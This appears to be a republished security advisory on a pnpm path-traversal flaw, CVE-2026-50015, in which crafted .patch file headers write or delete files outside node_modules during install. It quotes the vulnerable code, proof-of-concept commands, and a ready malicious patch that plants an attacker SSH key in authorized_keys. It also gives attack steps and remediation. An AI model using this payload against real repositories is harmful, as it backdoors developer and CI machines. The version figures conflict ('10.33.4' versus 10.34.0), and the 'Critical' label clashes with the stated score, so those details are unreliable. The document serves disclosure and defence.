pnpm, Path Traversal, CVE-2026-50015 (Critical) -DC-Jun2026-715


pnpm is a fast, disk-space-efficient package manager for JavaScript projects. Prior to versions 10.34.0 and 11.4.0, pnpm's patch application pipeline (`@pnpm/patch-package`) performs no path validation on file paths extracted from `.patch` files.
The vulnerability manifests during `pnpm install` when a `patchedDependencies` entry is present in `pnpm-workspace.yaml`. pnpm reads the referenced `.patch` file and applies it via the embedded `@pnpm/patch-package` library. The `applyPatchToDir` function at `patching/apply-patch/src/index.ts:12-13` calls `process.chdir(opts.patchedDir)`, setting the working directory to the installed package location deep inside `node_modules/.pnpm/`.
The patch parser at `@pnpm/patch-package/dist/patch/parse.js:88` extracts file paths from `diff --git a/(.*) b/(.*)` headers using a regex with no path sanitization. The `executeEffects` function in `apply.js` then operates on these unsanitized paths:

File write (`apply.js:35-49`):

```js
case 'file creation': {
  const eff = effect
  // eff.path is taken verbatim from the diff header and is resolved
  // relative to the chdir'd package directory; no containment check
  fs.ensureDirSync(dirname(eff.path))
  fs.writeFileSync(eff.path, fileContents, { mode: eff.mode })
  break
}
```

File delete (`apply.js:13-22`):

```js
case 'file deletion': {
  const eff = effect
  // TODO: integrity checks
  if (!opts.dryRun) {
    // same unsanitized eff.path; a `..` prefix deletes outside the package
    fs.unlinkSync(eff.path)
  }
  break
}
```

A path like `../../../../../../../../../../home/user/.ssh/authorized_keys` in the patch header traverses out of the package directory to an arbitrary location. An attacker who contributes a malicious patch file via a pull request can write attacker-controlled content to, or delete, arbitrary files on the filesystem during `pnpm install`, as the user running the install. `diff --git` header paths containing `../` sequences are difficult to catch in code review because patch file diff headers are opaque to most reviewers.
This vulnerability maps to CWE-22 (Path Traversal) and is classified as critical. The CVSS v3.1 score is 7.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H). The vulnerability is fixed in pnpm versions 10.34.0 and 11.4.0.

DailyCVE Form:

| Field | Value |
|-|-|
| Platform | pnpm |
| Version | < 10.34.0, < 11.4.0 |
| Vulnerability | Path Traversal (CWE-22) |
| Severity | Critical (CVSS 7.3) |
| Date | 2026-06-25 |
| Prediction | Patch already available |

What Undercode Say: Analytics

Affected Versions

| Version Range | Status |
|-|-|
| pnpm < 10.34.0 | Vulnerable |
| pnpm >= 11.0.0, < 11.4.0 | Vulnerable |
| pnpm 10.34.0+ | Fixed |
| pnpm 11.4.0+ | Fixed |

Proof of Concept Commands

```sh
# Write variant: creates /tmp/vuln6_pwned with attacker-controlled content
bash autofyn_audit/exploits/vuln6_patch_traversal_write/exploit.sh
# Result: PASS -- /tmp/vuln6_pwned created

# Delete variant: deletes /tmp/vuln7_target
bash autofyn_audit/exploits/vuln7_patch_traversal_delete/exploit.sh
# Result: PASS -- /tmp/vuln7_target deleted

# Combined chain: delete + replace SSH authorized_keys
bash autofyn_audit/exploits/chain2_patch_ssh_backdoor/exploit.sh
# Result: PASS -- authorized_keys replaced with attacker's public key
```

Malicious Patch File Structure

diff --git a/../../../../../../home/user/.ssh/authorized_keys b/../../../../../../home/user/.ssh/authorized_keys
new file mode 100644
index 0000000..1234567
/dev/null
+++ b/../../../../../../home/user/.ssh/authorized_keys
@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAA... attacker@evil
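Review bot: the `diff --git` header on the first line and the `+++ b/...` line both name `../../../../../../home/user/.ssh/authorized_keys`, a path with `..` components that resolves outside the patched package directory once `applyPatchToDir` has changed into it; a pre-apply check should `path.resolve` each header path against the package root and reject any result that does not stay under that root, and a reviewer should treat any `..` component in a patch header as a blocking finding rather than ordinary metadata.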

Exploit

An attacker can exploit this vulnerability by:

1. Submitting a Pull Request containing a malicious `.patch` file and a `patchedDependencies` entry in `pnpm-workspace.yaml`
2. Crafting the patch with `diff --git` headers containing `../` traversal sequences to escape the package directory
3. Targeting writable files such as:
   • `~/.ssh/authorized_keys` (SSH backdoor)
   • `~/.bashrc`, `~/.zshrc` (shell configuration)
   • CI/CD configuration files
   • Any file writable by the user running `pnpm install`
4. The attack occurs automatically when any user runs `pnpm install` on the compromised repository, executing as the user running the install

The exploitation is considered easy, and the attack can be initiated remotely. Patch files may receive less review scrutiny than `package.json` changes because the `../` traversal sequences are in `diff --git` headers that appear as ordinary patch metadata.

Protection

Immediate Remediation

Upgrade pnpm to a patched version:

```sh
# For pnpm 10.x
pnpm add -g pnpm@10.34.0
# For pnpm 11.x
pnpm add -g pnpm@11.4.0
```

Upgrading to version 10.33.4 or 11.4.0 eliminates this vulnerability.

Code-Level Fix (For Vendors)

Validate parsed patch file paths against the package root directory. Reject any path that resolves outside the patched package directory via `path.resolve` + prefix check. Alternatively, sanitize at parse time by rejecting paths containing `..` components in parse.js.

Security Controls

  • Automated scanning of patch files for suspicious path traversal patterns (../, ..\)
  • Restrict the use of patch files from untrusted sources
  • Code review training to identify path traversal sequences in `diff –git` headers
  • Runtime monitoring to detect unauthorized file system modifications during package installation
  • Maintain strict access controls on systems where pnpm is installed

Impact

Arbitrary file write and delete as the user running pnpm install, limited to paths writable by that user.

An attacker can:

  • Overwrite critical system files and inject malicious code
  • Establish persistence by modifying configuration files or scripts
  • Target SSH authorized_keys, shell configuration, CI/CD files, or other writable files
  • Execute arbitrary code on systems where pnpm is installed

The vulnerability is particularly dangerous because:

  • Patch files are commonly used in development workflows
  • The attack vector is subtle and difficult to detect during PR reviews
  • The attack occurs during the legitimate package installation process

Discovered by: AutoFyn

Full audit report: `audit_report.md`

Exploit script: `exploit.sh`

GitHub Security Advisory: GHSA-rxhj-4m44-96r4


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
